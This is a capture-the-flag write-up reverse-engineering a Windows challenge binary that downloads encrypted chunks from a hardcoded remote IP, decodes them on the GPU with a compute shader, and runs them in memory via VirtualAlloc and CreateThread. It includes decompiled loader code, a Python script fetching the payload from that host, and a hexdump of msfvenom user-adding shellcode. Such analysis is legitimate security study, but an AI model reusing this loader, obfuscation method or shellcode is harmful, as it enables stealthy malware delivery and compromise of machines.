[EN] Shutlock 2025 - Graphical_malware

Graphical Malware

Challenge discovery

$ file graphical.exe
graphical.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections

The binary is stripped so no symbols (only binary symbols are removed external libs still get their symbols to make it easier to reverse)

Some strings in the binary could give us some hints:

D3D11CreateDevice
Microsoft (R) HLSL Shader Compiler 10.1

We will be dealing with some shader in this binary

Reverse the malware

The main fucntion could be found at offset 0x7B4

Child creation

  if ( !strcmp(*(const char **)(a2 + 8), "shutlock") )
  {
    sub_140001E8B();
    return 0LL;
  }
  if ( !strcmp(*(const char **)(a2 + 8), "ctf") )
  {
    sub_140001F40();
    return 0LL;
  }

First it will check is argv[1] is either shutlock or ctf and if so it will run either sub_140001E8B or sub_140001F40, if argv[1] is neither shutlock or ctf it will continue the main function.

It will create a PIPE (that on Windows is one of the way wich multiple process could communicates with each others):

PipeAttributes.nLength = 24;
PipeAttributes.lpSecurityDescriptor = 0LL;
PipeAttributes.bInheritHandle = 1;


CreatePipe(&hReadPipe, &hWritePipe, &PipeAttributes, 0) 

Then it will create 2 processes:

    GetModuleFileNameA(0LL, Filename, 0x104u);
      _snprintf_s(Buffer, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "shutlock");
      _snprintf_s(CommandLine, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "ctf");
      StartupInfo.hStdOutput = hWritePipe;
      dwFlags = StartupInfo.dwFlags;
      BYTE1(dwFlags) = BYTE1(StartupInfo.dwFlags) | 1;
      StartupInfo.dwFlags = dwFlags;
      if ( CreateProcessA(0LL, Buffer, 0LL, 0LL, 1, 0, 0LL, 0LL, &StartupInfo, &ProcessInformation) )
      {
        CloseHandle(hWritePipe);
        WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFF);
        lpStartupInfo.hStdInput = hReadPipe;
        v6 = lpStartupInfo.dwFlags;
        BYTE1(v6) = BYTE1(lpStartupInfo.dwFlags) | 1;
        lpStartupInfo.dwFlags = v6;
        if ( CreateProcessA(0LL, CommandLine, 0LL, 0LL, 1, 0, 0LL, 0LL, &lpStartupInfo, &hHandle) )
        {
          CloseHandle(hReadPipe);
          WaitForSingleObject(hHandle.hProcess, 0xFFFFFFFF);
          CloseHandle(ProcessInformation.hProcess);
          CloseHandle(ProcessInformation.hThread);
          CloseHandle(hHandle.hProcess);
          CloseHandle(hHandle.hThread);
          sub_140001360("Finished\n");
          return 0LL;
        }

First it will run itself with argv[1] = shutlock and redirect stdout of this child to the previously created pipe : StartupInfo.hStdOutput = hWritePipe;, and then it will run itself with argv[1] = ctf and redirect the pipe to stdin of this child: lpStartupInfo.hStdInput = hReadPipe;.

For the rest of this writeup we will call child1 the child run with arg[1] = shutlock and child2 the one run with ctf

Child1

If we look back at the beginning of the function we saw that if argv[1] is shutlock it will run sub_140001E8B, we will rename this function child1_main:

__int64 child1_main()
{
  FILE *v1; // rax
  int v2; // eax
  FILE *v3; // rax
  FILE *v4; // rax
  size_t ElementCount; // [rsp+20h] [rbp-10h]
  void *Buffer; // [rsp+28h] [rbp-8h]

  Buffer = (void *)sub_140001CE5();
  if ( !Buffer )
    return 1LL;
  v1 = (FILE *)off_14000A0D0();
  v2 = _fileno(v1);
  _setmode(v2, 0x8000);
  ElementCount = (int)sub_140001ACA();
  v3 = (FILE *)off_14000A0D0();
  fwrite(Buffer, 1uLL, ElementCount, v3);
  v4 = (FILE *)off_14000A0D0();
  fflush(v4);
  free(Buffer);
  return 0LL;
}

The child1 main function is super simple, it create a buffer with sub_140001CE5() and write it to stdout, let’s look at sub_140001CE5, that we will rename get_buf:

void *get_buf()
{
  int v1; // eax
  int v2; // eax
  _QWORD Src[3]; // [rsp+20h] [rbp-30h] BYREF
  void *Block; // [rsp+38h] [rbp-18h]
  int v5; // [rsp+40h] [rbp-10h]
  int v6; // [rsp+44h] [rbp-Ch]
  int v7; // [rsp+48h] [rbp-8h]
  int i; // [rsp+4Ch] [rbp-4h]

  v6 = sub_140001ACA();
  if ( v6 <= 0 )
    return 0LL;
  v1 = v6 + 15;
  if ( v6 + 15 < 0 )
    v1 = v6 + 30;
  v5 = v1 >> 4;
  Block = malloc(v6);
  if ( !Block )
    return 0LL;
  for ( i = 0; i < v5; ++i )
  {
    Src[0] = 0LL;
    Src[1] = 0LL;
    Sleep(0x927C0u);
    if ( (unsigned int)sub_1400018B1((unsigned int)i, Src) )
    {
      free(Block);
      return 0LL;
    }
    if ( i == v5 - 1 )
      v2 = v6 % 16;
    else
      v2 = 16;
    v7 = v2;
    if ( !v2 )
      v7 = 16;
    memcpy((char *)Block + 16 * i, Src, v7);
  }
  return Block;
}

It get a int from sub_140001ACA malloc it and iterate from 0 to size//16 ( v1 = v6 + 15; v5 = v1 » 4;) , do a big sleep between each and call sub_1400018B1, let’s look at thoses 2 function, first the one that retrieve the size let’s rename it get_size:

__int64 sub_140001ACA()
{
  WCHAR szUrl[70]; // [rsp+30h] [rbp-50h] BYREF
  DWORD dwNumberOfBytesRead; // [rsp+BCh] [rbp+3Ch] BYREF
  _QWORD Buffer[12]; // [rsp+C0h] [rbp+40h] BYREF
  int v4; // [rsp+120h] [rbp+A0h]
  unsigned int v5; // [rsp+12Ch] [rbp+ACh]
  HINTERNET hFile; // [rsp+130h] [rbp+B0h]
  HINTERNET hInternet; // [rsp+138h] [rbp+B8h]

  hFile = 0LL;
  memset(Buffer, 0, sizeof(Buffer));
  v4 = 0;
  dwNumberOfBytesRead = 0;
  v5 = 0;
  hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
  if ( !hInternet )
    return 0xFFFFFFFFLL;
  sub_140001828(szUrl, 64LL, L"http://%ls/size", L"57.128.85.25:50002");
  hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
  if ( hFile )
  {
    if ( InternetReadFile(hFile, Buffer, 0x63u, &dwNumberOfBytesRead) )
    {
      *((_BYTE *)Buffer + dwNumberOfBytesRead) = 0;
      v5 = atoi((const char *)Buffer);
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return v5;
    }
    else
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return 0xFFFFFFFFLL;
    }
  }
  else
  {
    InternetCloseHandle(hInternet);
    return 0xFFFFFFFFLL;
  }
}

It do a GET request on http://57.128.85.25:50002/size , parse the result as int atoi((const char *)Buffer); and return it

Now what’s sub_1400018B1 that we will rename get_part:

__int64 __fastcall get_part(int a1, void *encoded_buff)
{
  __int64 v3; // [rsp+0h] [rbp-80h] BYREF
  __int64 dwFlags; // [rsp+20h] [rbp-60h]
  WCHAR szUrl[258]; // [rsp+30h] [rbp-50h] BYREF
  DWORD dwNumberOfBytesRead; // [rsp+234h] [rbp+1B4h] BYREF
  void *Src; // [rsp+238h] [rbp+1B8h]
  HINTERNET hFile; // [rsp+240h] [rbp+1C0h]
  HINTERNET hInternet; // [rsp+248h] [rbp+1C8h]

  hInternet = 0LL;
  hFile = 0LL;
  dwNumberOfBytesRead = 0;
  LODWORD(dwFlags) = a1 + 1;
  sub_140001828((__int64)(&v3 + 6), 256LL, (__int64)L"http://%ls/%d", L"57.128.85.25:50002", dwFlags);
  hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
  if ( !hInternet )
    return 1LL;
  Sleep(0x927C0u);
  hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
  if ( hFile )
  {
    if ( InternetReadFile(hFile, encoded_buff, 0x10u, &dwNumberOfBytesRead) )
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      Src = (void *)decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead);
      if ( Src )
      {
        memcpy(encoded_buff, Src, dwNumberOfBytesRead);
        free(Src);
        return 0LL;
      }
      else
      {
        return 0xFFFFFFFFLL;
      }
    }
    else
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return 1LL;
    }
  }
  else
  {
    InternetCloseHandle(hInternet);
    return 1LL;
  }
}

It also do a GET request on the IP to retrieve the n-th part and then call : decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead) that will call (__int64)sub_140002353(encoded_buff, size, 0xDEADBEEF - 0x42 * a1); that we will call gpu_decode

void *__fastcall gpu_decode(__int64 encoded_buff, size_t size, unsigned int key)
{
  _QWORD *v4; // rcx
  __int64 v5; // rdx
  __int64 v6; // [rsp+58h] [rbp-28h] BYREF
  _QWORD *v7; // [rsp+60h] [rbp-20h] BYREF
  __int64 v8; // [rsp+70h] [rbp-10h]
  __int64 v9; // [rsp+78h] [rbp-8h]
  __int64 v10; // [rsp+80h] [rbp+0h] BYREF
  int v11; // [rsp+88h] [rbp+8h]
  unsigned int v12; // [rsp+8Ch] [rbp+Ch]
  int v13; // [rsp+90h] [rbp+10h]
  __int64 v14; // [rsp+A0h] [rbp+20h]
  __int64 v15; // [rsp+A8h] [rbp+28h]
  __int64 v16; // [rsp+B0h] [rbp+30h]
  __int128 v17; // [rsp+C0h] [rbp+40h]
  __int64 v18; // [rsp+D8h] [rbp+58h] BYREF
  __int64 v19; // [rsp+E0h] [rbp+60h] BYREF
  __int64 v20; // [rsp+E8h] [rbp+68h] BYREF
  ID3D11DeviceContext *ppImmediateContext; // [rsp+F0h] [rbp+70h] BYREF
  ID3D11Device *ppDevice; // [rsp+F8h] [rbp+78h] BYREF
  void *v23; // [rsp+100h] [rbp+80h]
  unsigned int v24; // [rsp+108h] [rbp+88h]
  unsigned int v25; // [rsp+10Ch] [rbp+8Ch]
  LPVOID v26; // [rsp+110h] [rbp+90h]
  HGLOBAL hResData; // [rsp+118h] [rbp+98h]
  DWORD v28; // [rsp+124h] [rbp+A4h]
  HRSRC hResInfo; // [rsp+128h] [rbp+A8h]
  unsigned int v30; // [rsp+130h] [rbp+B0h]
  unsigned int v31; // [rsp+134h] [rbp+B4h]
  HRESULT v32; // [rsp+138h] [rbp+B8h]
  int v33; // [rsp+13Ch] [rbp+BCh]
  __int64 v34; // [rsp+140h] [rbp+C0h]
  __int64 v35; // [rsp+148h] [rbp+C8h]

  ppDevice = 0LL;
  ppImmediateContext = 0LL;
  v35 = 0LL;
  v34 = 0LL;
  v20 = 0LL;
  v19 = 0LL;
  v18 = 0LL;
  v33 = size;
  v32 = D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
  if ( v32 < 0 )
  {
    sub_1400020D0("D3D11CreateDevice failed\n");
    return 0LL;
  }
  v17 = 0LL;
  v16 = 0LL;
  v14 = 0x200000010LL;
  v15 = 0x1000000000004LL;
  v19 = sub_140002263((__int64)ppDevice, 16, 4u, 2, 0);
  if ( v19 )
  {
    v31 = size;
    v30 = (size + 3) & 0xFFFFFFFC;
    v35 = sub_140002263((__int64)ppDevice, v30, 0x88u, 0, 0);
    v34 = sub_140002263((__int64)ppDevice, v30, 0, 3, 1);
    if ( v35 && v34 )
    {
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
        ppImmediateContext,
        v35,
        0LL,
        0LL,
        encoded_buff,
        0,
        0);
      v13 = _mm_cvtsi128_si32((__m128i)0LL);
      v10 = 0x100000000LL;
      v11 = 0;
      v12 = v30 >> 2;
      v8 = key;
      v9 = 0LL;
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
        ppImmediateContext,
        v19,
        0LL,
        4LL,
        0,
        &v7);
      v4 = v7;
      v5 = v9;
      *v7 = v8;
      v4[1] = v5;
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
        ppImmediateContext,
        v19,
        0LL);
      ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
        ppImmediateContext,
        0LL,
        1LL,
        &v19);
      v32 = ((__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
              ppDevice,
              v35,
              &v10,
              &v20);
      if ( v32 >= 0 )
      {
        hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
        if ( hResInfo )
        {
          v28 = SizeofResource(0LL, hResInfo);
          hResData = LoadResource(0LL, hResInfo);
          if ( hResData )
          {
            v26 = LockResource(hResData);
            v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
                    ppDevice,
                    v26,
                    v28,
                    0LL,
                    &v18);
            if ( v32 >= 0 )
            {
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
                ppImmediateContext,
                0LL,
                1LL,
                &v20,
                0LL);
              ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
                ppImmediateContext,
                v18,
                0LL,
                0LL);
              v25 = (unsigned int)(v33 + 3) >> 2;
              v24 = (v25 + 255) >> 8;
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
                ppImmediateContext,
                v24,
                1LL,
                1LL);
              v6 = 0LL;
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
                ppImmediateContext,
                0LL,
                1LL,
                &v6,
                0LL);
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
                ppImmediateContext,
                0LL,
                0LL,
                0LL);
              v23 = malloc(size);
              if ( (unsigned int)sub_140002182((__int64)ppImmediateContext, v35, v34, (__int64)v23, v31) )
                return v23;
            }
            else
            {
              puts("CreateComputeShader failed");
            }
          }
          else
          {
            puts("LoadResource failed");
          }
        }
        else
        {
          puts("FindResource failed");
        }
      }
      else
      {
        sub_1400020D0("CreateUAV failed\n");
      }
    }
    else
    {
      sub_1400020D0("buffer creation failed\n");
    }
  }
  else
  {
    puts("Create constant buffer failed");
  }
  if ( v20 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v20 + 16LL))(v20);
  if ( v18 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v18 + 16LL))(v18);
  if ( v35 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v35 + 16LL))(v35);
  if ( v34 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v34 + 16LL))(v34);
  if ( ppImmediateContext )
    ((void (__fastcall *)(ID3D11DeviceContext *))ppImmediateContext->lpVtbl->Release)(ppImmediateContext);
  if ( ppDevice )
    ((void (__fastcall *)(ID3D11Device *))ppDevice->lpVtbl->Release)(ppDevice);
  if ( v19 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v19 + 16LL))(v19);
  return 0LL;
}

This function use the Direct3D 11 (https://fr.wikipedia.org/wiki/Direct3D ) that according to Wikipedia: “Direct3D is a graphics application programming interface (API) for Microsoft Windows. Part of DirectX, Direct3D is used to render three-dimensional graphics in applications where performance is important, such as games.”

So why is there some 3D libs in a binary that look like a malware ?

Let’s get a better understanding of the function, the function do:

First it create a Direct3D device and initialise it and load the encoded_buffer in it

D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
        ppImmediateContext,
        v35,
        0LL,
        0LL,
        encoded_buff,
        0,
        0);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
        ppImmediateContext,
        v19,
        0LL,
        4LL,
        0,
        &v7);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
        ppImmediateContext,
        v19,
        0LL);

(void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
        ppImmediateContext,
        0LL,
        1LL,
        &v19);

(__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
  ppDevice,
  v35,
  &v10,
  &v20);

Then it load the resource with the ID 0x65 (101)

hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
v26 = LockResource(hResData);

Then it use the resource to create a shader

v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
        ppDevice,
        v26,
        v28,
        0LL,
        &v18);
if ( v32 >= 0 )
{
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
    ppImmediateContext,
    0LL,
    1LL,
    &v20,
    0LL);
  ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
    ppImmediateContext,
    v18,
    0LL,
    0LL);
  v25 = (unsigned int)(v33 + 3) >> 2;
  v24 = (v25 + 255) >> 8;
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
    ppImmediateContext,
    v24,
    1LL,
    1LL);
  v6 = 0LL;
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
    ppImmediateContext,
    0LL,
    1LL,
    &v6,
    0LL);
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
    ppImmediateContext,
    0LL,
    0LL,
    0LL);

And finally it create a buffer and call sub_140002182

  v23 = malloc(a2);
  if ( (unsigned int)sub_140002182((_DWORD)ppImmediateContext, v35, v34, (_DWORD)v23, v31) )
    return v23;

Retrieve the shader

We know that the shader is loaded from a with ID: 101 (wich is located in the .rsrc section), we can use many techniques to retrieve it, but I usualy do it using PEstudio (https://www.winitor.com/download , the free version is enough), we load graphical.exe in it and then we can look at the resources panel.

/images/pestudio.png

We can see that there is the resource we are looking for with ID:101, we can dump it using Right Click -> instance -> save to file, we also see that the first bytes of the resource is DXBC wich with a bit of Googling indicate that it’s a shader bytecode for Direct3D.

We can decompile it using fxc :

 C:/Program\ Files\ \(x86\)/Windows\ Kits/10/bin/10.0.22621.0/x64/fxc.exe /dumpbin /nologo ressource.dump 

//
// Generated by Microsoft (R) HLSL Shader Compiler 10.1
//
//
// Buffer Definitions: 
//
// cbuffer KeyCB
// {
//
//   uint xorKey;                       // Offset:    0 Size:     4
//
// }
//
// Resource bind info for gData
// {
//
//   uint $Element;                     // Offset:    0 Size:     4
//
// }
//
//
// Resource Bindings:
//
// Name                                 Type  Format         Dim      HLSL Bind  Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// gData                                 UAV  struct         r/w             u0      1 
// KeyCB                             cbuffer      NA          NA            cb0      1 
//
//
//
// Input signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Input
//
// Output signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Output
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[1], immediateIndexed
dcl_uav_structured u0, 4
dcl_input vThreadID.x
dcl_temps 1
dcl_thread_group 256, 1, 1
bufinfo_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, u0.xyzw
ult r0.x, vThreadID.x, r0.x
if_nz r0.x
  ld_structured_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, vThreadID.x, l(0), u0.xxxx
  xor r0.x, r0.x, cb0[0].x
  iadd r0.x, r0.x, l(0x11001122)
  store_structured u0.x, vThreadID.x, l(0), r0.x
endif 
ret 
// Approximately 9 instruction slots used

The shader is simple it that the buffer (gData) into u0, the key (KeyCB) into cb0, xor them together and then add 0x11001122 to the result.

Ok now we understand how all part is decoded, it derive the key for each part : 0xDEADBEEF - 0x42 * i (i beeing the i-th part of the encoded data), xor the encoded data with the derivated key and then add 0x11001122.

If we go back to get_buf, each decoded block is append to the previous one : memcpy((char *)Block + 16 * i, Src, v7); and then returned to child1_main, and then it’s just printed to stdout. That cannot do any dammage ?

Child2

If we remember what we saw in the main everything printed to stdout of the 1st child will be redirect to the Pipe and then redirect to Child2 (because stdin of the 2nd child is the Pipe), so let’s take a look of the main function for the 2nd child :

__int64 child2_main()
{
  FILE *v0; // rax
  int v1; // eax
  FILE *v3; // rax
  DWORD flOldProtect; // [rsp+34h] [rbp-2Ch] BYREF
  HANDLE hHandle; // [rsp+38h] [rbp-28h]
  BOOL v6; // [rsp+44h] [rbp-1Ch]
  void *lpAddress; // [rsp+48h] [rbp-18h]
  void *Buffer; // [rsp+50h] [rbp-10h]
  size_t Size; // [rsp+5Ch] [rbp-4h]

  flOldProtect = 0;
  v0 = (FILE *)off_14000A0D0();
  v1 = _fileno(v0);
  _setmode(v1, 0x8000);
  LODWORD(Size) = get_size();
  if ( !(_DWORD)Size || (unsigned int)Size > 0x1000 )
    return 1LL;
  Buffer = malloc((unsigned int)Size);
  if ( !Buffer )
    return 1LL;
  v3 = (FILE *)off_14000A0D0();
  if ( fread(Buffer, 1uLL, (unsigned int)Size, v3) == (unsigned int)Size )
  {
    lpAddress = VirtualAlloc(0LL, (unsigned int)Size, 0x3000u, 4u);
    memmove(lpAddress, Buffer, (unsigned int)Size);
    v6 = VirtualProtect(lpAddress, (unsigned int)Size, 0x20u, &flOldProtect);
    hHandle = CreateThread(0LL, 0LL, (LPTHREAD_START_ROUTINE)lpAddress, 0LL, 0, 0LL);
    WaitForSingleObject(hHandle, 0xFFFFFFFF);
    return 0LL;
  }
  else
  {
    puts("stdin read error");
    free(Buffer);
    return 1LL;
  }
}

The child2’s main function is really straigth forward, it retrieve the payload size (using the same http request than in the 1st child), read that size from stdin and then do a classic VirtualAlloc->VirtualProtect->CreateThread to execute what have been read.

Get the final stage payload

So in summary the binary work like that:

  1. Create 2 childs
  2. Child1 -> get N part of 16byte each from a remote -> decode it in the GPU -> write the decoded payload to stdin of the 2nd child thru the pipe
  3. Child2 -> read the decoded payload -> Execute it

We just need to retrive each payload part, decode them and we should get some valid executable code, here is a python3 script that do thoses steps:

import requests
from pathlib import Path
from struct   import unpack_from, pack_into

URL   = "http://57.128.85.25:50002"
BASE_KEY   = 0xDEADBEEF

session = requests.Session()



def fetch(path: str) -> bytes:
    url  = f"{URL}/{path.lstrip('/')}"
    resp = session.get(url, timeout=10)
    resp.raise_for_status()
    return resp.content


def decode_chunk(chunk, part) -> bytes:
    key = (BASE_KEY - (part - 1) * 0x42) & 0xFFFFFFFF
    buf = bytearray(chunk)
    for off in range(0, len(chunk), 4):
        dword   = int.from_bytes(buf[off:off+4].ljust(4, b"\0"), "little")
        plain32 = ((dword ^ key) + 0x11001122) & 0xFFFF_FFFF
        pack_into("<I", buf, off, plain32)
    return bytes(buf[:len(chunk)])


def main():

    plaintext = bytearray()

    for i in range(1, 20):
        buf = fetch(str(i))
        decoded = decode_chunk(buf, i)
        plaintext.extend(decoded)

    with open("payload.bin","wb") as f:
        f.write(plaintext)


if __name__ == "__main__":
    main()

Flag

Once we run this payload we get the final payload :

hexdump -C payload.bin
00000000  fc 48 83 e4 f0 e8 c0 00  00 00 41 51 41 50 52 51  |.H........AQAPRQ|
00000010  56 48 31 d2 65 48 8b 52  60 48 8b 52 18 48 8b 52  |VH1.eH.R`H.R.H.R|
00000020  20 48 8b 72 50 48 0f b7  4a 4a 4d 31 c9 48 31 c0  | H.rPH..JJM1.H1.|
00000030  ac 3c 61 7c 02 2c 20 41  c1 c9 0d 41 01 c1 e2 ed  |.<a|., A...A....|
00000040  52 41 51 48 8b 52 20 8b  42 3c 48 01 d0 8b 80 88  |RAQH.R .B<H.....|
00000050  00 00 00 48 85 c0 74 67  48 01 d0 50 8b 48 18 44  |...H..tgH..P.H.D|
00000060  8b 40 20 49 01 d0 e3 56  48 ff c9 41 8b 34 88 48  |.@ I...VH..A.4.H|
00000070  01 d6 4d 31 c9 48 31 c0  ac 41 c1 c9 0d 41 01 c1  |..M1.H1..A...A..|
00000080  38 e0 75 f1 4c 03 4c 24  08 45 39 d1 75 d8 58 44  |8.u.L.L$.E9.u.XD|
00000090  8b 40 24 49 01 d0 66 41  8b 0c 48 44 8b 40 1c 49  |.@$I..fA..HD.@.I|
000000a0  01 d0 41 8b 04 88 48 01  d0 41 58 41 58 5e 59 5a  |..A...H..AXAX^YZ|
000000b0  41 58 41 59 41 5a 48 83  ec 20 41 52 ff e0 58 41  |AXAYAZH.. AR..XA|
000000c0  59 5a 48 8b 12 e9 57 ff  ff ff 5d 48 ba 01 00 00  |YZH...W...]H....|
000000d0  00 00 00 00 00 48 8d 8d  01 01 00 00 41 ba 31 8b  |.....H......A.1.|
000000e0  6f 87 ff d5 bb f0 b5 a2  56 41 ba a6 95 bd 9d ff  |o.......VA......|
000000f0  d5 48 83 c4 28 3c 06 7c  0a 80 fb e0 75 05 bb 47  |.H..(<.|....u..G|
00000100  13 72 6f 6a 00 59 41 89  da ff d5 6e 65 74 20 75  |.roj.YA....net u|
00000110  73 65 72 20 47 50 55 5f  6d 34 6c 77 61 72 65 73  |ser GPU_m4lwares|
00000120  5f 41 52 45 5f 66 75 6e  20 74 44 74 4e 52 59 4a  |_ARE_fun tDtNRYJ|

We can see a strings in plaintext at the end : net user GPU_m4lwares_ARE_fun tDtNRYJ, that is a command on windows to add a user (it’s a msfvenom shellcode to add a user on the PC)